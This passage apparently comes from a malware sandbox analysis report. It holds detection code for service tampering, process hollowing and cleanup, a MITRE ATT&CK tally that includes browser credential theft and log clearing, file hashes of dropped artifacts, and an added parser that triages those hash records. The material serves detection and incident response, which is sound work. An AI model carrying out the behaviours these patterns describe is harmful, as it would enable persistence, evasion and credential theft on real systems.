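    findings = []
    for p in procs:
        cl, b = p.cmdline.lower(), basename(p.image)
        if b == "schtasks.exe" and "/delete" in cl:
            findings.append(("scheduled task removed", p.pid))
        if b == "cmd.exe" and "\\temp\\" in cl and ".bat" in cl:
            if any(basename(c.image) == "timeout.exe" for c in p.children):
                findings.append(("temp batch with timeout (delayed cleanup)", p.pid))
    return findings


if __name__ == "__main__":
    tree = parse_tree(SAMPLE)
    print("update services stopped:", update_service_tampering(tree))
    print("hollowing candidates:", hollowing_candidates(tree))
    print("cleanup:", cleanup_pattern(tree))
```

Keying the service-stop detection on the parent rather than on individual sc.exe lines is what keeps it quiet on administrators who stop one service by hand; the dialer.exe rule requires both the unusual parent and the injection signatures, because dialer.exe launched by explorer.exe is ordinary.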
Network
MITRE ATT&CK Enterprise v16 (technique: number of matching signatures)
Execution
  Command and Scripting Interpreter: 1
    PowerShell: 1
  Scheduled Task/Job: 1
    Scheduled Task: 1
  System Services: 2
    Service Execution: 2
Persistence
  Boot or Logon Autostart Execution: 1
    Registry Run Keys / Startup Folder: 1
  Create or Modify System Process: 2
    Windows Service: 2
  Event Triggered Execution: 1
    Netsh Helper DLL: 1
  Scheduled Task/Job: 1
    Scheduled Task: 1
Privilege Escalation
  Boot or Logon Autostart Execution: 1
    Registry Run Keys / Startup Folder: 1
  Create or Modify System Process: 2
    Windows Service: 2
  Event Triggered Execution: 1
    Netsh Helper DLL: 1
  Scheduled Task/Job: 1
    Scheduled Task: 1
Defense Evasion
  Impair Defenses: 1
  Indicator Removal: 1
    Clear Windows Event Logs: 1
  Modify Registry: 3
  Obfuscated Files or Information: 1
    Command Obfuscation: 1
Credential Access
  Credentials from Password Stores: 1
    Credentials from Web Browsers: 1
  Unsecured Credentials: 1
    Credentials In Files: 1
Downloads
- Filesize 414B
  MD5    f39ad1b5334e3c05ea773dd1a5a379f8
  SHA1   5e97ca1a9b40bc933696893780f72bb2954ad17f
  SHA256 bcf7c1a033d62ebe1502524b8ec9248f955b17e6a9fe79e5717758c5f918b2c3
  SHA512 2555e680e55bd62e4574f3cd3f846e9cee3e08dd6cd5265dc80627f4fb24f939766f9bf5d80046cc2c8f08dbb99511b529788fe6fc373ac9b519fb3629e0c913

- Filesize 1KB
  MD5    3cd06142a6586b107f2d183974b05df4
  SHA1   2314946576fa7a69502637715e661f1018556f19
  SHA256 279933b64d87df5d6ca9b098431c606594e52d025a0bcffc5430055ca1d41b84
  SHA512 0c959f0436220350e294d86724c885da0a7ae08249acad29db5846c605b65ab379eaf51f5e52728518a71e6436dbad8dd8103e85a3d059322eeb0ed3567a6556

- Filesize 2B
  MD5    d751713988987e9331980363e24189ce
  SHA1   97d170e1550eee4afc0af065b78cda302a97674c
  SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
  SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

- Filesize 356B
  MD5    41a7f079e85c2a4f54e1052247b077a3
  SHA1   9afc19e2362b26cdaa9bf0edf833fa921f94aedb
  SHA256 96bac7a7fe2f09187e96e566d0cc74c18d52c5581091b10bd4e12979e4b682d7
  SHA512 7ac203a83e3f0fd6eb3a39a753f715e9f22247dd3cc55dfa01107926d4a780a4d92eb40a396dd55593c68010661d31a8f63447fa5c5d63a48c5c79c4de9576b5

- Filesize 10KB
  MD5    70a873ad9a8fd76dd48ed67b696206e2
  SHA1   c424ff332aef2d8c490db3416b2895378b565251
  SHA256 b2a76595f7bbcf3c8cf3705fc9cf5edb5adb318cec0f46bcaf3686aa8cc56b4d
  SHA512 5b2d5761d8711613098d8bd9755a38a5885ea26d79a05f13bd3bd9272ee36abecdc23d207a6085f87601851b56dd9a48668618b9f4827d9c99f0312299988bc5

- Filesize 10KB
  MD5    b85910f60e03ac318ae6d385fa7567c3
  SHA1   36482aa7ecc8af72b9b06ad387232e2c0d6ef662
  SHA256 d42917eecc4d4d49823b993666eb40d6849678fdf724a71238c16d744cb26206
  SHA512 89435e4472bc6590a1bc3a983a49590110a047c23e592604bd5e40c1e37bc0122025d8b904b01f54fa665a3cdb6edc080f45374569d49c28a0c884beb1cd99bd

- Filesize 15KB
  MD5    0076526279bad6f48b87df29d93c8198
  SHA1   09784f630e60882893b77a6ec5df0e574abdb290
  SHA256 d036875940f444d2cf0603ac81726abbfefdc2d5a6bf0852d6e0dfe83067f1f0
  SHA512 48cbf72c347aaf1ea23707f45658ca9386e5dfb1fed6c8c3fe56a53ae572e7747bdddbd0af034192bb512726889d21ebeada7d6ba24aa0295500057d99f96985

- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
  Filesize 72B
  MD5    02fa9cfba0efa98d9cecef5c87ce62d5
  SHA1   697d65a9e5f14e4fdd2258d9dda600085ba95edb
  SHA256 c95e3888ecc710ae7446109296f1aabfd46beee7f8a564ca93024b410af77c85
  SHA512 9c98f4bfb3d98fa49659ee59e83b0d7465631f902769a412db3586e7a0148dd24eacc83c4428e48ff4726909e72cbf12cc31ff277b0df58fbb951b32244cd0f4

- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe594472.TMP
  Filesize 48B
  MD5    1a0a456f856873a5a9309edce3fab473
  SHA1   b92d8b78a34ab62e40fff4005b49474881fbe3b6
  SHA256 03c3497adcbeabdccf628f44b1177f89f94879a5a773ffaf0bedfba6e29ee60e
  SHA512 c8d344bd9f7297f88ce61dd28e5c5a2b9ac0f3d4ba074d7a576ea711914de9027677d58c547fdac58ee45216945b44e6d91293b42256ff819f035749b042fc46

- Filesize 79KB
  MD5    a17e200fbd878dbf1c2ab1b41055a4a9
  SHA1   6230263ac84f203773d750583e6d161f1c196ea0
  SHA256 8506bb9534d6bd8a63eab4993f965128ed7f89d060b50da73219a1e753a50188
  SHA512 8545eafd94f53238b34aa11f90358c96139d1482194028a3cf42accc073714e1562f6b9619c9fff9958643c083defff75077aeed6c41d347d94fe3235375ce5e

- Filesize 153KB
  MD5    d24e447c83e1abe8a220d59708e9af4c
  SHA1   d82d24b49bd1fd8d9bfcfc21ef92d87dfc296e0b
  SHA256 353fa9cd42fc4b3fd1f5110d9caca240288a9c21d5c53ab3902c1c9f97c5f081
  SHA512 af4becd3c01dd0dcfd9aedaf817028efa6e5504408ceb0b1d9baaa79720532946643b9c0c764ef61b833a3c1f70c9237f16c3bf6f39dd9ab2c33c0867c50ffa8

- Filesize 153KB
  MD5    8f8d03cca457b9c2f8d0167411ddbe73
  SHA1   c141c820fedc664b81655efe9a045b9d229a016e
  SHA256 03f76d380b89410221fc5ffa00d2f335bdaf09359fee8495349e36924dfac214
  SHA512 9cc003af1410d6c3ba6af018aef8d7df2058b7686be0343fd2fa179fcb4b75ee23541f041d36213f3ec2c18c71826cd91d94433278f724f8093b65b4e0715e76

- Filesize 1KB
  MD5    fde7cc81ed0c50e7ce18702102f19ace
  SHA1   e9f02b348fda9b22bb3999b4ebef4d366f153086
  SHA256 00ac4add3fbf73f31bdeb249969dddc68da554c9e9383ec524d63c64dc3f4b53
  SHA512 75bf55c4f619948f16e29f51008d026e7789eda82615f566b150d54f5769b64d7fe1a6ff8be458e2630be621c551183dfe272ce0a579024065cbc2b4b26f4bf5

- Filesize 280B
  MD5    36326fcbb6119326e7c8aa24c4156548
  SHA1   ed128a9727e1d58b970e732b8c66fc827b18372b
  SHA256 ac41191dcaf36d91f7bd9a077bc59b1bd7218daa27b263d1da6a548f58264987
  SHA512 ed5c79f1edc0c65a1cf0ace91ea5538245c1569c3b25ae3cdf033ffcb55d37e7b09baec36570e82fc1525c24224cea08a53abab7e52db6376f48f099ffefd1fe

- Filesize 280B
  MD5    59d3e3ccb8d73684023b287c1dc4650a
  SHA1   f989d6d53547697667335762bd843a6b26ea04f5
  SHA256 da635f10f1c92925f0579ebbfaccfe6512a81255722740213808bc39ebf5c6c7
  SHA512 038d405074d54756d8b0daafdfb6d0b9382bbfc40b2a2e630b92fcf797fca05e987d1c3ae0e0240f21d55216f51d3c0bdd88a7bc6ebea11b72ac1fca36309e28

- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\0c0a3ea6-a3b9-4976-9d7c-f7c8974e1d2c.tmp
  Filesize 1B
  MD5    5058f1af8388633f609cadb75a75dc9d
  SHA1   3a52ce780950d4d969792a2559cd519d7ee8c727
  SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
  SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
- Filesize 44KB
  MD5    e30c8acefa2c4297eb1ec8f7d5154e18
  SHA1   9dd81a5adfd2c00bf2a346ab341131db13745957
  SHA256 d850bb6bd280a6ca96adee87974d99cee6af09c11af17a51d9486d3a732fbb3d
  SHA512 1e31c247dfa9acc261131ae46a96153b7fd83f141f555c4252239187be9108613b59be77d436349e42bf9e181acf37db6d22957c56e792e6d10cd1aaa67e4e51

- Filesize 264KB
  MD5    2655aa40d903b6e2c13f1a9715a68b15
  SHA1   85acf76f1117730ac9c0c8ef120ee5168330dd7a
  SHA256 4c596282fab16f2720c1dfc35c79236d7e9f7741742a96744d4666cf2ac7355f
  SHA512 2934f9bdceefa02462ddd98d64e6fdc8f677725760dc8ef209bed56548c5f017688d2436d1033844e61cb0f651a68f4d5040bd3c9395ae178179a34d3e04fa04

- Filesize 8.0MB
  MD5    61c83dfd5f24c2d83f36b4d57a2b0b78
  SHA1   92a17768440a7f0882550b7425ad4c1821c46328
  SHA256 30686e7d2547790ac5bf8d87c0b4a0eb6f3282ea15097ee5565a326e7794b57a
  SHA512 38ce4f1754422109afa5b9e33e1eb00dac82c7d657062959107468e74153fd19d53ee4c232cdd2ee8a1ab5320d1cb9f0f2c01a25fb1cdc1616413307c1c14728

- Filesize 264KB
  MD5    f50f89a0a91564d0b8a211f8921aa7de
  SHA1   112403a17dd69d5b9018b8cede023cb3b54eab7d
  SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
  SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

- Filesize 2B
  MD5    99914b932bd37a50b983c5e7c90ae93b
  SHA1   bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
  SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
  SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

- Filesize 192KB
  MD5    f03fa59413375068ade61faf7a993ce1
  SHA1   71b7a64a6c357e8585c2ab4142499e51c346fb77
  SHA256 dc07756791fb5e3f19d37bff28c8f542d5415cecfdc72192c07b31d4cb7f48ca
  SHA512 cc1cf3c68e3d61b66f539e50b1bbe07b93734f9ab86d2fbd8f3f3c18cb1b8ed7f7b110fa179ed153ff51a40c389dd27f316674b6c222af8c612eb9362a573a4b

- Filesize 108KB
  MD5    06d55006c2dec078a94558b85ae01aef
  SHA1   6a9b33e794b38153f67d433b30ac2a7cf66761e6
  SHA256 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd
  SHA512 ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60

- Filesize 2KB
  MD5    458f1861e184d55ef4d96b05eed2fb66
  SHA1   70db872ea8232600581ce8ddd26a93955de83b43
  SHA256 7649fe588036ca9b083f094272b0a7b686e0edc25dd2fc2da14493608ad3abf3
  SHA512 ea77c2a1783abfebb2edcdd0bd55566a88f8d05d69626c60dc883c2edf61985572744e300f462afeaece87993ace853651685615ab7dca56030f67c37c661980

- Filesize 40B
  MD5    20d4b8fa017a12a108c87f540836e250
  SHA1   1ac617fac131262b6d3ce1f52f5907e31d5f6f00
  SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
  SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

- Filesize 15KB
  MD5    dd2e0b582993de8fd19504fd7cf625cf
  SHA1   1438136cb58ca0f46447e76ca0c5b464242ea097
  SHA256 2053b94262df44b382deee9b97c86c8e829c912415bc252a1ae628d1b32daeff
  SHA512 72cfe01038c2e5c3c48087a74273c14f5cfac82b25f1fee40ecddb17779fe391b95fc5fe6f1a809f6b86be20961fdccd4e21544df793c5d3b827827380fec89d

- Filesize 16KB
  MD5    67d0b77a2005e6529c30a42d27d809c7
  SHA1   0aed333411d87e7e3226cef0bbe222a57edb1661
  SHA256 0d78f432287723a7b9da232b63745905d12e2aa6c5505bba3660e2ac8a3ad509
  SHA512 9c24a17888c2df18ac66268a59a4fbfc73d74c241f6a02a1b3bfaa171228635929d60f0a575289e78670bf5f785f67f326ae3add528adb0e3f61848c5b16bbe5

- Filesize 36KB
  MD5    b2960e082ce87150e53f5d2ad4be8833
  SHA1   f36f8a021247599690ce652a948b86c45b80fc16
  SHA256 bdb1f5dedbd164e3d2b9881c46923abb602d429fca22e53d9370ac9c53462930
  SHA512 5d5ebb02e784de88b07750e3129fa2683276c2177fc512adfb704c4b2f75a24daa04af7e6a02558e30066cd6c623c3ab7212d9038587acb06b573197a796ebd4

- Filesize 335B
  MD5    c626ad11649c79e3fd021247d60eb1af
  SHA1   12a27ce93a15941c82712138c49c09b70fb0d7a4
  SHA256 0b486accc79f7bf758bebfac8c94df1b45fc0abd218b7df8a4ff950d6a8633f9
  SHA512 690ac7b44bd55210848352d9adbce3c7cf9faa7fd75fe7e701722e5ce598ab026b88e809cd296222ff0a3ccece2f8a8a6a654e71fc9c509db28e3ae5fdcc1a37

- Filesize 350B
  MD5    a6ed6b45dad3d9c439fff83c2695be38
  SHA1   4418a8bf205652dfd0a04272c1b9ef6b65e41938
  SHA256 78b6849ce51328c8f69f6b6cbd532c861cd53eba60df68972c65122bda98e2ea
  SHA512 41bd3ed160c11a412973bc7d4cf8906c03c7c38a06cb75e68f8ca1ba7a9de8d2429d75852117539a10cb94b905944d5ae302e760859bcaca16597555c38288c9

- Filesize 323B
  MD5    b5781c95d34c86654d040027ea2d6853
  SHA1   2ab83bada6335a2aa40e7b828fae69aebd2cc85f
  SHA256 7099407217378f6593f672ee6231853742e864647aed01f49cc13ef08d93899b
  SHA512 f32502abbeeff587eb633cdfe9a6d0f577fdfc33a412493338b65683aea220eb474460b2a7e0f34eefc0b1117f960b216bdeb06efd80c866648c5a4f0728a5ec

- Filesize 22KB
  MD5    28ce813fea1e3b30cbbd0709cad09443
  SHA1   580e515ebb3d91dbfbc4e8b2a95e1ea7a4fe1646
  SHA256 77bc93285ab8c9c5aca6069322aabcb2c6af22ec7905a1ee06606dd549abdc6c
  SHA512 bcf45637c491f4b44ce24dd3de149cbed84f4c0a67ef87e9362d7741e1007f291f657fcded087392dd9641fca600a10c4d203b3a181a63dbb44dae25e8ab63a0
- Filesize 128KB
  MD5    d1f9a1a945298dc40fa5c98ba379c77d
  SHA1   96b527884a744c8d37a9d5f1d26e83bd3cf38da2
  SHA256 f06c9c32e7e5efff0e137b68bebcb3c3cee87578f20f6e5692c0c0c472f241bc
  SHA512 f91bc378ef7ee5d7b1fe0526e6bc6bb307d05e57df17fc62de277cf2d05da8f4821f2154334185024bc371162355c708b719d21bca54aa86a08185a7bc27d1d0

- Filesize 13B
  MD5    3e45022839c8def44fd96e24f29a9f4b
  SHA1   c798352b5a0860f8edfd5c1589cf6e5842c5c226
  SHA256 01a3e5d854762d8fdd01b235ce536fde31bf9a6be0596c295e3cea9aaf40f3dd
  SHA512 2888982860091421f89f3d7444cacccb1938ef70fc084d3028d8a29021e6e1d83eaef62108eace2f0d590ed41ece0e443d8b564e9c9a860fc48d766edb1dc3d9

- Filesize 54KB
  MD5    cbf32db5aef5a6e9c65041d2dab622d9
  SHA1   90f35f5341522b1dac5e3e38ea1e256afdc6378f
  SHA256 175328b47f399e244cccd9919b9040a87927059cca9901947262cbfb60a83c57
  SHA512 2603849f411bc946af8dc0fcf1201b0829d3a25ade5be8e865002fd9a07be2cc7f236669ba39c478056fdd9cbbd5d043d2650f2d21ecf1b92ac1270a75e41183

- Filesize 54KB
  MD5    1a98274bfa86069be7b0dbb8dcf167a0
  SHA1   015c7e8839830f394ecfa783b3c6aa3f182616f8
  SHA256 2ae2e64444ccf61d904020c5a4b516ba8f02bc4fd113ca999481977eb544531d
  SHA512 748bd0b92078cf6b80b7c2dfce8c6fb2117f2e9286eb63335fdad35d903dc6e8fe8221ca32608aea6147f7668185e8b9d8136af8c2cbc3369e4e551edb4c3650

- Filesize 40KB
  MD5    96520b2715b18824afc4ced48ea5533a
  SHA1   a029d7c1327d9b15c4bfffa361778e1f465f02db
  SHA256 80280adb178086fd68f3d9c09140e5bcf9e680712bc58ee28d04e16c8c12731a
  SHA512 fcc93d51dcca3c06c8764d4f778da1a5851f5c7b9c126304f4d83c19163147b6698e0e33f72e398f42e595a2018a7df81860af84756490f7da4caced61000ded

- Filesize 40KB
  MD5    1433a720a65253183624aad3dec9a45b
  SHA1   1e33997bc96fbf453f194ab03609eab8eab2af8d
  SHA256 4699b1d334c030584f1722a7b101f9046c1b0b2f51cc577519e1c828fb11c462
  SHA512 0608bf313b349ea43d8951d188709e6b832f709a9776e54edf9b2cb4ea4fc0d7e6fcaac925325d2296c3ed8e87b196c95053fc12e19b8eba3883423d700c9b03

- Filesize 264KB
  MD5    62f13551681b6458bbc711c8b52cb7ab
  SHA1   1de05426e07f486a436465f43180f3126f325dde
  SHA256 215ec52c8e80c69fb6c2f7323153bfb04c8bfe090c248f84defa05de66313706
  SHA512 92509a1540c4051f652164bf308a9712462589ec7122ed934b2438aead86020652dc5cc474d24389b79883b7d37fab5f0345565d022452f659c9fb202dba47f8

- Filesize 86B
  MD5    961e3604f228b0d10541ebf921500c86
  SHA1   6e00570d9f78d9cfebe67d4da5efe546543949a7
  SHA256 f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed
  SHA512 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

- C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
  Filesize 2KB
  MD5    ad194e8c7806b1994b56acba749ddf70
  SHA1   20ae0f73b983f0b748a6504f9fb1e1c7f8a6e802
  SHA256 c0003276e0d4e9c32e76e44b101d019043e0b93af37ee8a81efd2aa6c8d35fe1
  SHA512 f963b04d62119fae18c48951c350f1b49241292e711e6275e565f2de1cb017f6bc1c7e7759807a3f9fdacc9d0edf747a5665bf8395aecdbd19be98f85be88abb

- Filesize 18KB
  MD5    b8a33aa094af018d8431665dc3e14d2f
  SHA1   be2e69b4850222a2263069d42aab90488b10faf2
  SHA256 42f33aec308ad7da8ae4d54a47cc23f2c1572c67a26e226abe969adebe263860
  SHA512 92c250840a6a18e2a5971ec6c2fc4a639e5c971fbef4d2efdd04f2d4c400b66696d573f4602c8d2807f2085d7e57c620405c4c6955be250488d444ee2a73b271

- Filesize 7.9MB
  MD5    8c785c53009428b38afac4b7a6b93c10
  SHA1   2877606f84020beb917bd9b02483645bdcb07b42
  SHA256 fa84153083d3de758fdc3ed86a9185f026755b9c89ba6f779ecd6df19ec1a94d
  SHA512 23e20700b5d5f4c37c2701738f8ff5a010aaaca7ca4fce16703913dbe340239beb5ba403e92e7ef60b7e903b8d402e7ed29b7eee4048d7c4ec56de1ddb9db815

- Filesize 60B
  MD5    d17fe0a3f47be24a6453e9ef58c94641
  SHA1   6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

- Filesize 87KB
  MD5    f1c3f0c151b4b375a7b6f0a934b9e0d2
  SHA1   e1550ea133d153e7e13ddeb6a7ed19fd1c2ce22c
  SHA256 7c7f38ad559e020bf8843ab9c5413acc3ab42786054a7c56d0c1b6e84ce5d75c
  SHA512 8bc1791dcbd7aa19ace144fe7d7b997d2f41e98c4c7cac1206254b393e591ffef6d7ccc19de055c96558641e22fc9aeb2954f269da83068473309c0388b7d77d

- Filesize 716B
  MD5    d945801bb65b57524011cf0474ba0f0f
  SHA1   eb4708741bb6dbce89239ddc1dad3a43dfb4403d
  SHA256 ff1afd836f4bc07130484d89690d8251dd10218cc15b5a15fa04228376f55268
  SHA512 cc2d9b4f5467ea53f05f65d76047c7f9e9f6bef8dd618ae9f834cadefaece4ea71e7d3814c32be7fe3c4bad0b27d6aafb27b1b5a4dfcfb53e928356dd92abc21

- C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC
  Filesize 16B
  MD5    f5c4fca52ede7a1173c28186128056d3
  SHA1   c5184c28a972a646c8a3fe68f3c25e77ef2612af
  SHA256 0bfe4ec1ae3f35ea64a3976443ad90f2825528df97c96a501f9a97af0fd74435
  SHA512 29694fe89b3037a0ca1ee95382791ee2f3c4a9dd0067f41cf1152234fd45c3282bd43ce4edcd8b8c015868a21df78cb9b2d52e145d1caa4a5e04d0524092da1b

- Filesize 402KB
  MD5    39ba631f3e54a2c480e7c83e5e6d14ff
  SHA1   82f3e3f1faf9d879a37e473a81cb5d32672af099
  SHA256 3dd90786fa7eb27ec458cd54b83801027490cb39f6f570f4779ab63b54504d64
  SHA512 0c5bb9e46a54343aa0c3a46367ff9216472598d1cfd854003da5e782e8be485622cfce6a1912d54c4dce348d4824b3009ecde4ecf5be0d89baa500fb63ff9c16

- Filesize 2.7MB
  MD5    1cf0ec247776f6817231070a2f75994c
  SHA1   3253eccccece8243d11975e7021569251def8f2f
  SHA256 e867dd037f2f1d8a36c6a0d3972ddd027f9536838e92d6aa911a60f47cf2f051
  SHA512 f2c011d2dcb2eb5efea73c89fdd5c99534f5956485a982329de39361db2cda92ccbed4d38860b767c2149b78e8ba7ed8117793955e60a773bc8c05937112be90

- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
  Filesize 2KB
  MD5    2f57fde6b33e89a63cf0dfdd6e60a351
  SHA1   445bf1b07223a04f8a159581a3d37d630273010f
  SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
  SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize 1KB
  MD5    aa187cac09f051e24146ad549a0f08a6
  SHA1   2ef7fae3652bb838766627fa6584a6e3b5e74ff3
  SHA256 7036d1846c9dc18e19b6391a8bcfbb110006c35791673f05ebf378d7c16c6d5f
  SHA512 960f07a7f2699121c23ecdb1429e39b14485957b41ff9d201c737d1675f2d4cd97d4a3de4bce4fb18155c14183b96b2689a36df94297dba035eef640136b0df2

- Filesize 1.5MB
  MD5    b5e966fbfca567c51d5da8b2106a48e5
  SHA1   164ace9df43f1a760c1205f82c9cc4eb1dfee991
  SHA256 30e97b3c23a562d5ea0b8605ded5a5b22529defc42c1a420dfbb3e42007910c8
  SHA512 9169eaab184c2412dc469cee331efca0b17ed4efa8ec791d1c3320b7914a2132dba76dccf7700cbe1084c2ab00e3e4bec277564bdb0a9f2e9739e559109bc534
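As extracted, the download list fuses each hash label to its value (MD5<hex>, SHA1<hex>, ...) and mixes records that carry a path with records that do not. The added example below, not part of this report or of any sandbox vendor's tooling, parses records in that raw form, validates each digest by length before accepting it, separates the tiny browser-profile placeholder files (whose digests equal those of constructed candidate contents such as "[]", "{}" and ".") from the large unlabelled binaries that are worth pulling for static analysis. The sample records are a constructed subset copied from the list above; the candidate-content table and the 1 MiB threshold are assumptions.

```python
"""Parse fused-label download records from a sandbox report into validated IOC
records and triage them. Added example; not part of the report. Python 3.8+."""
import hashlib
import re
from typing import Dict, List, Optional, Tuple

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}
# Assumption: contents Chromium-based browsers write to tiny profile files.
CANDIDATES = [b"", b"[]", b"{}", b".", b"0", b"1", b"\n"]

# Constructed subset of the list above, in its raw extracted form.
SAMPLE = r'''
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\0c0a3ea6-a3b9-4976-9d7c-f7c8974e1d2c.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
8.0MB
MD561c83dfd5f24c2d83f36b4d57a2b0b78
SHA192a17768440a7f0882550b7425ad4c1821c46328
SHA25630686e7d2547790ac5bf8d87c0b4a0eb6f3282ea15097ee5565a326e7794b57a
SHA51238ce4f1754422109afa5b9e33e1eb00dac82c7d657062959107468e74153fd19d53ee4c232cdd2ee8a1ab5320d1cb9f0f2c01a25fb1cdc1616413307c1c14728
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
15KB
MD5dd2e0b582993de8fd19504fd7cf625cf
SHA11438136cb58ca0f46447e76ca0c5b464242ea097
SHA2562053b94262df44b382deee9b97c86c8e829c912415bc252a1ae628d1b32daeff
SHA51272cfe01038c2e5c3c48087a74273c14f5cfac82b25f1fee40ecddb17779fe391b95fc5fe6f1a809f6b86be20961fdccd4e21544df793c5d3b827827380fec89d
'''


def split_hash_line(line: str) -> Optional[Tuple[str, str]]:
    """'SHA197d1...' -> ('sha1', '97d1...'); None unless the remainder is hex of the
    exact length for that algorithm (this is what disambiguates SHA1 from SHA256)."""
    for label, n in HASH_LEN.items():
        if line.startswith(label):
            rest = line[len(label):].lower()
            if len(rest) == n and all(c in "0123456789abcdef" for c in rest):
                return label.lower(), rest
    return None


def size_bytes(size: str) -> int:
    m = re.match(r"^([\d.]+)\s*([KMG]?B)$", size.strip())
    if not m:
        raise ValueError("unrecognised size: %r" % size)
    return int(float(m.group(1)) * UNITS[m.group(2)])


def _finish(rec: Dict) -> Dict:
    rec["size_bytes"] = size_bytes(rec.get("size", "0B"))
    rec["valid"] = all(k in rec for k in ("md5", "sha1", "sha256", "sha512"))
    return rec


def parse_downloads(text: str) -> List[Dict]:
    """Records are separated by '-' lines; 'Filesize' may be followed by the size on the
    next line or fused to it; an optional drive-letter path precedes the size."""
    records: List[Dict] = []
    cur: Dict = {}
    lines = iter(text.splitlines())
    for raw in lines:
        line = raw.strip()
        if not line or line == "-":
            if cur:
                records.append(_finish(cur))
                cur = {}
            continue
        if line == "Filesize":
            cur["size"] = next(lines).strip()
        elif line.startswith("Filesize"):
            cur["size"] = line[len("Filesize"):].strip()
        elif split_hash_line(line):
            algo, digest = split_hash_line(line)
            cur[algo] = digest
        elif re.match(r"^[A-Za-z]:\\", line):
            cur["path"] = line
    if cur:
        records.append(_finish(cur))
    return records


def trivial_content_matches(records: List[Dict], max_size: int = 16) -> Dict[str, str]:
    """md5 -> decoded content for tiny records whose MD5 and SHA256 both equal those of
    a candidate; requiring both digests rules out a lucky MD5 collision."""
    table = {hashlib.md5(c).hexdigest(): c for c in CANDIDATES}
    out: Dict[str, str] = {}
    for r in records:
        if r["valid"] and r["size_bytes"] <= max_size and r["md5"] in table:
            content = table[r["md5"]]
            if hashlib.sha256(content).hexdigest() == r["sha256"]:
                out[r["md5"]] = content.decode()
    return out


def large_unlabelled(records: List[Dict], min_bytes: int = 1 << 20) -> List[Dict]:
    """Big files the report lists without a path: the ones to pull for static analysis."""
    return [r for r in records if r["size_bytes"] >= min_bytes and "path" not in r]


if __name__ == "__main__":
    recs = parse_downloads(SAMPLE)
    print("placeholders:", trivial_content_matches(recs))
    print("large unlabelled:", [r["sha256"] for r in large_unlabelled(recs)])
```

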